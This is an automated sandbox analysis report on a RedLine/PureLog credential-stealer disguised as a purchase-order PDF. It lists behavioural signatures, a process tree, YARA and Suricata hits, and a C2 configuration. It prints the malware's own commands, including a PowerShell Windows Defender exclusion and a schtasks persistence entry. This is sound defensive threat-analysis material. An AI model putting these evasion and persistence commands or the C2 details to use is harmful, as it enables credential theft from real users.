
Windows Analysis Report
PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe

Overview

General Information

Sample name: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Analysis ID: 1530636
MD5: 2940b15a52c0aaa97db24e4043ffffcf
SHA1: fa29bd64c6fd9ca4811db98aa8608691cb0324c3
SHA256: 6cb077ac45cc280c1ace4f4b7f7ec0feb23487074ac50e0113ade7e9509dbb85
Tags: exe, user-lowmal3

Detection

PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Contains functionality to detect sleep reduction / modifications
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to many different domains
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 2940B15A52C0AAA97DB24E4043FFFFCF)
    • svchost.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 2940B15A52C0AAA97DB24E4043FFFFCF)
      • svchost.exe (PID: 6044 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • microsofts.exe (PID: 576 cmdline: "C:\Users\user\AppData\Local\Temp\microsofts.exe" MD5: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3)
        • Native_Redline_BTC.exe (PID: 6180 cmdline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" MD5: 8C8785AC6585CF5C794B74330B3DB88F)
          • build.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
          • server_BTC.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
            • powershell.exe (PID: 5880 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • schtasks.exe (PID: 6204 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • TrojanAIbot.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
            • cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 7348 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • alg.exe (PID: 7120 cmdline: C:\Windows\System32\alg.exe MD5: 882AAAB29114AA61C89B0726B6FA58A4)
  • TrojanAIbot.exe (PID: 7396 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7472 cmdline: C:\Windows\system32\AppVClient.exe MD5: 5308671F56D4A4A4CDF6FF841AEF1780)
  • FXSSVC.exe (PID: 7780 cmdline: C:\Windows\system32\fxssvc.exe MD5: 283D4068FC62E71EA43B248224FAE579)
  • elevation_service.exe (PID: 8052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AC37DAB395406B7A2E223F34625726DE)
  • maintenanceservice.exe (PID: 8108 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: F20BF005553AB1557724E26FBFDB22C5)
  • msdtc.exe (PID: 8144 cmdline: C:\Windows\System32\msdtc.exe MD5: 46966EB01AA74C66C8C45009CAFCA510)
  • TrojanAIbot.exe (PID: 7192 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • PerceptionSimulationService.exe (PID: 7308 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 367BAC61864EA78BE8F89AAEA741C1B2)
  • perfhost.exe (PID: 2300 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: AFAD48DC29F1CF4A38DCFFCDB37F8BA9)
  • Locator.exe (PID: 7232 cmdline: C:\Windows\system32\locator.exe MD5: 3A5699061E1911C756244F5DD3EFCD56)
  • SensorDataService.exe (PID: 5428 cmdline: C:\Windows\System32\SensorDataService.exe MD5: A30B8B3725152FFD1FEF45C52D3261B8)
  • snmptrap.exe (PID: 4476 cmdline: C:\Windows\System32\snmptrap.exe MD5: 7D3200FA5E7F0DAE65D4ECB41018A0E8)
  • Spectrum.exe (PID: 2172 cmdline: C:\Windows\system32\spectrum.exe MD5: 2DDE61D6384346F05BA3DA4D78A1740A)
  • ssh-agent.exe (PID: 7756 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 03402E65F6A814316E26E0D2EB369ABC)
  • TieringEngineService.exe (PID: 7868 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 10F8624709D07DA72863BBB00DFD5D16)
  • AgentService.exe (PID: 7660 cmdline: C:\Windows\system32\AgentService.exe MD5: FB45B515238278E8D72072D18DD7382C)
  • vds.exe (PID: 7928 cmdline: C:\Windows\System32\vds.exe MD5: 2EE227E57FDD41A436C3DE33802B4D02)
  • wbengine.exe (PID: 7344 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 21B54458FED133A5634A8ABCCB5B5220)
  • cleanup
Malware Configuration

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\build.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\microsofts.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | matched strings listed below
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(10 entries in total; only the first 5 are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.Native_Redline_BTC.exe.12354d08.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.microsofts.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | matched strings listed below
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
6.2.Native_Redline_BTC.exe.123eb188.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.3.microsofts.exe.590000.1148.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.3.microsofts.exe.6e3718.17.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(14 entries in total; only the first 5 are shown)

                            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 1272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6204, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\microsofts.exe, Initiated: true, ProcessId: 576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49712
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6204, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ParentImage: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ParentProcessId: 7140, ParentProcessName: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ProcessId: 1088, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ParentImage: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ParentProcessId: 7140, ParentProcessName: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ProcessId: 1088, ProcessName: svchost.exe
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-10T10:09:07.445163+0200 | 2051651 | 1 | A Network Trojan was detected | 192.168.2.5 | 53567 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:29.544972+0200 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 63907 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:31.577907+0200 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 54745 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:28.326326+0200 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 63299 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:30.046321+0200 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 64943 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:28.296964+0200 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-10T10:07:29.068154+0200 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49713 | TCP
2024-10-10T10:07:33.148215+0200 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49724 | TCP
2024-10-10T10:08:06.325846+0200 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 49929 | TCP
2024-10-10T10:08:07.906644+0200 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 49942 | TCP
2024-10-10T10:08:13.663685+0200 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 49985 | TCP
2024-10-10T10:08:14.476076+0200 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 49992 | TCP
2024-10-10T10:08:22.918743+0200 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50017 | TCP
2024-10-10T10:08:28.103171+0200 | 2018141 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50022 | TCP
2024-10-10T10:08:46.579278+0200 | 2018141 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 50040 | TCP
2024-10-10T10:08:55.636463+0200 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50057 | TCP
2024-10-10T10:09:05.122422+0200 | 2018141 | 1 | A Network Trojan was detected | 44.213.104.86 | 80 | 192.168.2.5 | 51583 | TCP
2024-10-10T10:07:28.296964+0200 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-10T10:07:29.068154+0200 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49713 | TCP
2024-10-10T10:07:33.148215+0200 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49724 | TCP
2024-10-10T10:08:06.325846+0200 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 49929 | TCP
2024-10-10T10:08:07.906644+0200 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 49942 | TCP
2024-10-10T10:08:13.663685+0200 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 49985 | TCP
2024-10-10T10:08:14.476076+0200 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 49992 | TCP
2024-10-10T10:08:22.918743+0200 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50017 | TCP
2024-10-10T10:08:28.103171+0200 | 2037771 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50022 | TCP
2024-10-10T10:08:46.579278+0200 | 2037771 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 50040 | TCP
2024-10-10T10:08:55.636463+0200 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50057 | TCP
2024-10-10T10:09:05.122422+0200 | 2037771 | 1 | A Network Trojan was detected | 44.213.104.86 | 80 | 192.168.2.5 | 51583 | TCP
2024-10-10T10:07:28.978523+0200 | 2043234 | 1 | A Network Trojan was detected | 212.162.149.53 | 2049 | 192.168.2.5 | 49706 | TCP
2024-10-10T10:07:27.497755+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:34.043970+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:34.589789+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:35.130041+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:35.981709+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:36.844179+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:37.969534+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:40.570303+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
